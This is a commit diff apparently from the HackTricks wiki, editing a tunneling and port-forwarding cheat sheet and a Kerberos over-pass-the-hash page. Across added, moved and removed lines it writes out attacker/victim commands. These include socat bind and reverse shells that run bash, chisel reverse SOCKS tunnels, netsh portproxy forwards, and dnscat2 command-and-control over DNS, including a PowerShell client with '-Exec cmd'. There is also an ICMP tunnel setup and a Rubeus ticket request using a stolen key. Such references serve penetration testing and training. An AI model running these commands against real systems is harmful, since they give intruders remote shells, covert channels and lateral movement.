GitBook: [#3553] No subject

generic-methodologies-and-resources/tunneling-and-port-forwarding.md

@@ -202,6 +202,22 @@ rportfwd_local [bind port] [forward host] [forward port]
 rportfwd_local stop [bind port]
 ```
 
+## Windows netsh
+
+### Port2Port
+
+You need to be a local admin (for any port)
+
+```bash
+netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
+# Example:
+netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 
+# Check the port forward was created:
+netsh interface portproxy show v4tov4
+# Delete port forward
+netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
+```
+
 ## reGeorg
 
 [https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
@@ -220,19 +236,16 @@ You need to use the **same version for client and server**
 ### socks
 
 ```bash
-./chisel server -p 8080 --reverse #Server -- Attacker
-./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client -- Victim
+./chisel server -p 8080 --reverse #Server
+./chisel-x64.exe client 10.10.14.3:8080 R:socks #Client
 #And now you can use proxychains with port 1080 (default)
-
-./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
-./chisel client -v 10.10.10.10:8080 socks #Attacker
 ```
 
 ### Port forwarding
 
 ```bash
-./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
-./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505 #Client -- Victim
+./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
+./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
 ```
 
 ## Rpivot
@@ -268,7 +281,7 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
 
 ```bash
 victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
-attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
+attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
 ```
 
 ### Reverse shell
@@ -281,13 +294,13 @@ victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
 ### Port2Port
 
 ```bash
-socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
+socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
 ```
 
 ### Port2Port through socks
 
 ```bash
-socat TCP4-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
+socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
 ```
 
 ### Meterpreter through SSL Socat
@@ -351,53 +364,6 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
 echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
 ```
 
-## Windows netsh
-
-### Port2Port
-
-You need to be a local admin (for any port)
-
-```bash
-netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
-# Example:
-netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=4444 connectaddress=10.10.10.10 connectport=4444 
-# Check the port forward was created:
-netsh interface portproxy show v4tov4
-# Delete port forward
-netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=4444
-```
-
-## SocksOverRDP & Proxifier
-
-You need to have **RDP access over the system**.\
-Download:
-
-1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - This tool uses `Dynamic Virtual Channels` (`DVC`) from the Remote Desktop Service feature of Windows. DVC is responsible for **tunneling packets over the RDP connection**.
-2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
-
-In your client computer load **`SocksOverRDP-Plugin.dll`** like this:
-
-```bash
-# Load SocksOverRDP.dll using regsvr32.exe
-C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
-```
-
-Now we can **connect** to the **victim** over **RDP** using **`mstsc.exe`**, and we should receive a **prompt** saying that the **SocksOverRDP plugin is enabled**, and it will **listen** on **127.0.0.1:1080**.
-
-**Connect** via **RDP** and upload & execute in the victim machine the **`SocksOverRDP-Server.exe` ** binary:
-
-```
-C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
-```
-
-Now, confirm in you machine (attacker) that the port 1080 is listening:
-
-```
-netstat -antb | findstr 1080
-```
-
-Now you can use [**Proxifier**](https://www.proxifier.com/) **to proxy the traffic through that port.**
-
 ## Proxify Windows GUI Apps
 
 You can make Windows GUI apps navigate through a proxy using [**Proxifier**](https://www.proxifier.com/).\
@@ -457,29 +423,14 @@ ssh <user>@1.1.1.2 -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
 
 ### DNSCat2
 
-****[**Download it from here**](https://github.com/iagox86/dnscat2)**.**
-
 Establishes a C\&C channel through DNS. It doesn't need root privileges.
 
 ```bash
 attacker> ruby ./dnscat2.rb tunneldomain.com
 victim> ./dnscat2 tunneldomain.com
-
-# If using it in an internal network for a CTF:
-attacker> ruby dnscat2.rb --dns host=10.10.10.10,port=53,domain=mydomain.local --no-cache
-victim> ./dnscat2 --dns host=10.10.10.10,port=5353
 ```
 
-#### **In PowerShell**
-
-You can use [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) to run a dnscat2 client in powershell:
-
-```
-Import-Module .\dnscat2.ps1
-Start-Dnscat2 -DNSserver 10.10.10.10 -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd 
-```
-
-#### **Port forwarding with dnscat**
+**Port forwarding with dnscat**
 
 ```bash
 session -i <sessions_id>
@@ -509,28 +460,11 @@ Root is needed in both systems to create tun adapters and tunnel data between th
 ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
 ```
 
-### ptunnel-ng
-
-****[**Download it from here**](https://github.com/utoni/ptunnel-ng.git).
-
-```bash
-# Generate it
-sudo ./autogen.sh 
-
-# Server -- victim (needs to be able to receive ICMP)
-sudo ptunnel-ng
-# Client - Attacker
-sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
-# Try to connect with SSH through ICMP tunnel
-ssh -p 2222 -l user 127.0.0.1
-# Create a socks proxy through the SSH connection through the ICMP tunnel
-ssh -D 9050 -p 2222 -l user 127.0.0.1
-```
-
 ## Other tools to check
 
 * [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
 * [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
+* [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
 
 <details>
 

windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key.md

@@ -4,15 +4,11 @@
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>
 
@@ -44,25 +40,25 @@ Possible problems:
 This kind of attack is similar to **Pass the Key**, but instead of using hashes to request for a ticket, the ticket itself is stolen and used to authenticate as its owner.
 
 {% hint style="warning" %}
-When a TGT is requested, event `4768: A Kerberos authentication ticket (TGT) was requested` is generated.  You can see from the output above that the KeyType is **RC4-HMAC** (0x17), but the default type for Windows is now **AES256** (0x12).
+When a TGT is requested, event `4768: A Kerberos authentication ticket (TGT) was requested` is generated. You can see from the output above that the KeyType is **RC4-HMAC** (0x17), but the default type for Windows is now **AES256** (0x12).
 {% endhint %}
 
 ```bash
 .\Rubeus.exe asktgt /user:<USERNAME> /domain:<DOMAIN> /aes256:HASH /nowrap /opsec
 ```
 
+## References
+
+* [https://www.tarlogic.com/es/blog/como-atacar-kerberos/](https://www.tarlogic.com/es/blog/como-atacar-kerberos/)
+
 <details>
 
 <summary><strong>Support HackTricks and get benefits!</strong></summary>
 
-- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
+* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
 
 </details>